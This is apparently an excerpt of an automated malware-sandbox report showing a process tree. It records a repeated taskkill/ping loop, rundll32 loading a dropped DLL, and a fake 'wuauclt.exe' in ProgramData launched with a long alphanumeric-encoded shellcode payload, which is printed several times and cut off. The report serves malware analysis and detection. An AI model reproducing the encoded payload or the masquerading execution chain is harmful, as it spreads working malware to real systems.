- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1524
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:4256
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4572
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:956
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4884
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:3472
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1364
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2632
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1092
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3128
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5072
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3740
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1516
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4296
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4052
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2036
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3688
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4204
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4596
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4436
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    PID:4756
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5048
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3536
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3232
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - Runs ping.exe
    PID:368
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1320
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1552
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:956
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4884
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:2888
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4580
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:864
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3744
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:60
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2344
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:4824
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1288
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3740
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4432
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:3468
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3636
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:4536
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1228
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:1512
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4880
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:4696
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2136
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:2372
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4508
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:3168
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4708
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1644
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:1088
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:4124
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:4468
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:432
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:4444
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1152
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    PID:4248
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2304
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:1448
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1948
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:1196

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\instsrv.dat,da 123
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1276

C:\ProgramData\IMEJP10\wuauclt.exe
C:\ProgramData\IMEJP10\wuauclt.exe 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 [100] PC@
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4824
- C:\ProgramData\IMEJP10\wuauclt.exe
  C:\ProgramData\IMEJP10\wuauclt.exe LLLLYIIII7QZAkA0D2A00A0kA0D2A12B10B1ABjAX8A1uIN2uNkXlMQJLePvbUPePJgW59t7kwOKDSPJgg5hh2ZezxFVXJg75xlrebuXbtKyWqUXp5FKfZvYPKwpEzTm7xosdLUO7w5zXLnN0dVNKO72eKLYKJs3ROEucKypdnkgEVP5PgpUPLKRVtLLKT6ELLKw6WxlKQnwPLKp6u6vYPOr8RUzRnkyHlKRs7LNkpTvzt8wsxSlIqEYLlK1bQ0wsZSNkSzFxVSjrk9aEkhcfrqLKsen8NmQmXdlMulNwwCJrkLnM5SO3rrpVvSZrNkxpVSiPKLnLlDKpptEWKqYR334rN0XkHtLKyRQNBzgK370t7t72xbklJlNkw5klLK3xuteSxKQvNkTTRqnkG8wlESjkNks4J1wsISk9VgKN75JxOpsMxX7vpYaNqnlkPj60lK9MnazKGpUQUPGpbsQzEPKOpUKTOuO0tOk4nQWpePUPlKzUmQJNePeQgpwpGsl0KMNLrFUmQL303DURzK8wKLiWSvfbQsbORN1vhG2fUVaySWfNcTKwpF4J3QPtuPWpBJc0PhMPwpwp7pazUSsZuPSZS1PhWpUP7pMPpSioSeKXNczXKOsDPlLKJxSZ7pPSkO65JTMYQUxLSZw0SX30VpS0S02p1zgpYoSel8neKpOy0ExPPtpMpj7pnmF5iDf2ioSEXLv0qCKOv5XlLE9PT4ekbskOse8pLKcezpNkPMxLmQYTuPURePuPlKM5QMP3iKsyRqmZuJP0Wl7zXbkKbyTsKkcsK0KKKORUUT5cKkZKzVvP5LvjXbJQnmK2tStL7pePF0crkOKbySAN2unkZLk1jLGpdBWpwpo73uKTWkwOIdU0iWW5kX0z5zjfTxO7rexlsu2uM2TKxGbejP5Fn6HVyPXG1Ul4M7XoRtZ5yW2ezXNNxP4VlkO73uilYKhSSR856SHIsTnkgE6PGpUPUPLKPvtLNkafWllKrfGxLKsNa0NkwFQvVYPODXPuXrLKkhlKPSgLlK646zT84ChSmYceKlNkqbepwshsLKPJ6xFSkbmYQEzxpVv1Nk2uN8LMcMHdLM5lLWp39BKLlmTCXCf2SfP38RLKzPecyPKLllLDiP2TEWiQO2USvRzphk8tLKKrCnBzwKVg3DwtaRM2KlzlnkG5KlNksxUtfcxKPfnkwdPQNkRhWleSJklKVdNqC3hCNi4GkNpEjxMPqmZx7vSiSnSNnKbJV0lKyMmQjK7p7q5PgpPS2J7pioF5ytMUYPFoLDoRGpwp5PLKL5k1zNuPFa7pWp7sxpymLl56wMQLePRTWrxkKGYl9WPFWr2CBORNE6HGQVVf1ybGTnPdO7qVfjaqT4UPS0azgpSXk0WpgpUPSZuSqzWppj31qxuPePuPmPPSioseKXMSKHKOPtaMLKKhrJ5PqCKOpUjTMYCuhLsZ3pQx7p4PWp7prprJUPioceHxK5KpmYW5ZpQdWNsZUPLM3ekdPRkOBUzlpP63kORuxlneIPbT4lpSKOv58pLKPUN0Nk2m8LnaYTuPs2WpGpNkkUsmecKkQYSamZuJP0wl4JkRkKCidsIKNmMRuC4L30s02pW2kOhRYSD2A00A0kA0D2A12B10B1ABjAX8A1uIN2unkZLk1jLGpdBWpwpo73uKTWkwOIdU0iWW5kX0z5zjfTxO7rexlsu2uM2TKxGbejP5Fn6HVyPXG1Ul4M7XoRtZ5yW2ezXNNxP4VlkO73uilYKhSSR856SHIsTnkgE6PGpUPUPLKPvtLNkafWllKrfGxLKsNa0NkwFQvVYPODXPuXrLKkhlKPSgLlK646zT84ChSmYceKlNkqbepwshsLKPJ6xFSkbmYQEzxpVv1Nk2uN8LMcMHdLM5lLWp39BKLlmTCXCf2SfP38RLKzPecyPKLllLDiP2TEWiQO2USv